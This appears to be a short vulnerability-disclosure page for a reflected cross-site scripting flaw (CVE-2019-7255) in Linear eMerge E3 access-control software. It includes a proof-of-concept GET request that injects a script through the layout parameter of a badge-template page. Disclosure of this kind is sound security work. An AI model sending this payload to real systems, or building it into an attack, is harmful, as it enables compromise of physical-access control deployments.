Linear eMerge E3 1.00-06 Cross Site Scripting

Linear eMerge E3 versions 1.00-06 and below suffer from a reflective cross site scripting vulnerability.


MD5 | 30e885414e737bb06b40d088ff11c336

Download

Linear eMerge E3 Unauthenticated Reflected XSS
Affected version: <=1.00-06
CVE: CVE-2019-7255
Advisory: https://applied-risk.com/resources/ar-2019-005

Discovered by Gjoko 'LiquidWorm' Krstic

PoC:
GET /badging/badge_template_v0.php?layout=<script>confirm('XSS')</script> HTTP/1.1

Source: packetstormsecurity.com
Related Posts